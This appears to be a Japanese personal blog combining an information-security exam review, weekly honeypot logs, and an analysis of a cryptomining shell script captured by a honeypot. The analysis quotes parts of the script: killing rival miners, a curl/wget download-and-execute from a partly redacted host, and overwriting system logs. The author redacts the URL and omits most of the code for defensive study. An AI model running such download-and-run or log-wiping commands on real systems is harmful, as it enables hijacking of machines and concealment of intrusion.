前回に引き続きサラッと見ました。

少し仕事にも絡んでくるところだったので、前回よりも少し真面目に解いております。

午前II

17/25

結果はギリギリ合格笑

試験勉強した上で望めば、ケアレスミスなくて済んだかもしれない。

以下は特に個人的に気になった設問。

問2 OCSPの役割を問う問題

OCSPとは、TCP/IPネットワークを通じてデジタル証明書（公開鍵証明書）の有効性を問い合わせる手順を定めたプロトコル（通信規約）。暗号化やデジタル署名に用いるX.509証明書が何らかの理由により有効期限前に失効している場合、そのことを速やかに知ることができる。

下記より引用 e-words.jp

こんなプロトコルすっかり忘れていた。でも、なんかCRL関連だったというのは思い出したのでウかエの2択までは絞り込めた。（絞り込んだうえで間違えた）

問5 仮想通貨におけるクリプトジャッキング

クリプトジャッキング（cryptojacking）とは、仮想通貨の「マイニング」(「採掘」の意)を不正に行うこと。マイニングとは、仮想通貨の取引に必要な計算に協力した対価として仮想通貨を獲得できる仕組みだ。

下記より引用 securityblog.jp

クリプトジャッキングという単語がわからなかった。なんとなく自分の中でイメージして回答したら当たっていた。ラッキー。

とはいえ、仮想通貨に関する問題が増えてきたなというイメージ。これからもこの傾向が続くのだろうか。

最新の参考書を買っていればここら辺の仮想通貨に関する単語とかも掲載されていそうですね（手元にあるの2017年度のものなので既に情報が古い・・・）

問10 CSRFの脆弱性の対策

IPAが好きな問題だなーという印象。ここら辺はIPAが出している安全なWebサイトの作り方とかAppGoatで勉強していれば、余裕なはず。 もちろん、Webアプリの脆弱性を勉強するなら、徳丸本もいいですよね。

問18 無線LANにおける隠れ端末問題

隠れ端末問題 (かくれたんまつもんだい、hidden node problem)とは、ネットワーク通信の分野において、ALOHAや、CSMA/CA、IEEE 802.11などのプロトコルで発生する有名な問題である。

下記より引用 ja.wikipedia.org

単語自体を知らなかった・・・

なんか意味合い的に、無線LANの無許可の利用についてかな？とか想像したけど、大きく外しましたね。悔しい。

午後I

個人的に選択するなら、問1か問2ですね。

問1

Webサイトのセキュリティに関する問題

今回は同一生成ポリシーに関する問題でしたね。

基本的にJSONP使うなり、CORSでサーバー側で設定するなりして、よりセキュアな方法で実装してあげるのがベター。

JSONPだとリクエストしている内容が個人情報とか外部に漏洩してはいけないようなものを提供していればアウトという認識。理由は、スクリプトの中身書き換えられて攻撃者に任意のリクエストを行えるようにしてしまうため。

だから、今回の問題のようにCORSをサーバー側で設定してあげる方が無難ですね。

問2

クラウドサービスに関する問題

そろそろくると思っていた、認証周りのお話が来ましたね。 OTPとかパスワードレスとかが話題に上がっておりました。 パスワード認証に関しては、もうそろそろ全体的に見直しがかかってほしいところですね・・・

あと公衆無線LANはできるだけ使わないようにしましょう。

問3　

IoT製品に関する問題。 ゲームに関する問題というのがなかなか新しい気がしました。

TRMなどが出てきて、問2とはまた違った内容。 どちらかいうとハード面での知識も求められるような気がしました。

午後II

問1

マルウェアに関する問題。

マルウェアに感染した端末があり、外部に情報が流出しました。

それらをFWなどのネットワーク機器を用いてどのように検知することができたかや対策をどう練ればよかったかという問題ですかね。

マルウェアに対する対策に加えて無線LANに関する知識なども求められており、個人的には少し苦手な問題です。

問2

情報セキュリティ強化に関する問題

情報セキュリティのルールや運用ポリシーが紹介された上で、情報漏洩が発生してしまったのでそれの対策に関する問題のようですね。

マルウェアに感染して、外部に情報流出というのは問1と同じ流れだなと思いました。

まとめ

個人的な予測としては、サプライチェーン攻撃とか、働き方改革をネタにしたリモートワークを取り入れる時のセキュアな制度とか、ビジネスメール詐欺くるかなと思ったけど、来なかったですね。

まさかの公開鍵などを用いた認証が二回も出るというね。 この公開鍵周り勉強していない人だったら、詰んでたかもしれないですね。

ハニーポット観察日記としての定期アウトプットです。

観察期間：2019年 04月06日 00:00:00 - 2019年04月12日 23:59:59

CVE

CVE-2003-0818が205も大量の検地が行われました。 www.cvedetails.com

攻撃種別

マルウェア

Cowrie

Total: 14

Dionaea

Total: 59

所感

crontabの設定難しい・・・

ハニーポット #ハニーポット観察

ハニーポットで久々にシェルが置かれていたので、中身を読んで解析をしてみました。

2019年4月6日の記事で確認できたマルウェアです。

ultrabirdtech.hatenablog.com

取得したマルウェアについて

仮想通貨をマイニングするシェルが置かれていました。

Virustotal

いくつかのベンダーの解析結果は仮想通貨をマイニングするシェルだという結果が出ています。

Linux/CoinMiner.GL

後、最後の方で特定のURLに繋いで次のマルウェアをDLしているようなので、そのような記載もされております。 Trojanなのでトロイの木馬をDLするのですかね。

Trojan-Downloader.Shell.Miner.y

www.virustotal.com

トレンドマイクロの記事

下記のようにトレンドマイクロさんでも同じようなシェルを確認しています。

シェル内に記述されているURLが同じなので、同系統のマルウェアのようです。

blog.trendmicro.co.jp

シェルファイルの中身

注意1:セキュリティ面を考慮して伏せ字を使用する箇所があります。

注意2:マルウェアは全文掲載はしません。この記事の内容だけではマルウェアが完成しないように配慮しております。

注意3:怪しいURLなどは絶対にアクセスしないでください。

プロセスをkill & フォルダを削除

# ファイル、フォルダを削除する
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
・
・

pkill はプロセス名を指定してプロセスをkillするコマンドですね。

# プロセスをKillしている
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
・
・

ps auxf の grep 結果から条件に一致するもののプロセスを殺している。

・
・
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
・
・

netstat の結果からも同様に殺していますね。

・
・
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
・
・

このような記述が続いております。 一般的にマルウェアがこのような動きをする理由は、自分自身のプロセスの動きを邪魔するプロセスを殺しにきているからですね。

ファイルをDLする

ファイルをDLしています。 120秒でタイムアウトするように設定されていますね。 一応URL全部完成できないように伏せ字にしています。（他のページ見れば再現できますが、アクセスはしないでくださいね）

# curl でファイルを取得する（■は伏せ字)
(curl -fsSL --connect-timeout 120 http://yxarsh[.]■■■■/■■■■ -o /tmp/r1x||wget http://yxarsh[.]■■■■/■■■■ -O /tmp/r1x)

# 取得したファイルの権限を変更
chmod +x /tmp/r1x

# ファイル実行
/tmp/r1x

ログの上書き

最後にsecureやcronなど複数のログを消してます(0で上書いている)

・
・
echo 0>/var/log/secure
echo 0>/var/log/cron
・
・

b関数とd関数

function b() {
pkill -f sourplum
・
・
・

}

function d() {
chattr -i /tmp/r1x
・
・
・
}

b関数とd関数が定義されていました。 b関数は主に自分自身を動きやすくするため邪魔するプロセスを殺したり、フォルダを作成するような機能が記述されています。

d関数は次に使用するマルウェアをDLするような記述がされていました。

私が記述的に面白いなと思ったのが下記の呼び出し部分。

・
・
b
d
・
・

この、b と d だけで関数呼び出せるのは簡潔ですね。

今回のように100行くらいで完結しているファイルであれば、この一文字以上の情報はいらないですね。

まとめ

久々にハニーポットに置かれたシェルの中身を呼んだ。 マルウェアを解析する際は攻撃者が何を考えて配置してくるかということを考えると、解析もはかどりますね。

逮捕されないかビクビクしながらやっております。 もっと気軽にアウトプットできるような世の中になってほしいという意思を込めて、少し怖いけど記事にしました。

ハニーポット観察日記としての定期アウトプットです。

観察期間：2019年 03月23日 00:00:00 - 2019年03月29日 23:59:59

CVE

攻撃種別

マルウェア

Cowrie

Total: 27

Dionaea

Total: 100

所感

今年度最後のハニーポット観察日誌。 なんだかんだ一年続いた。

ハニーポット #ハニーポット観察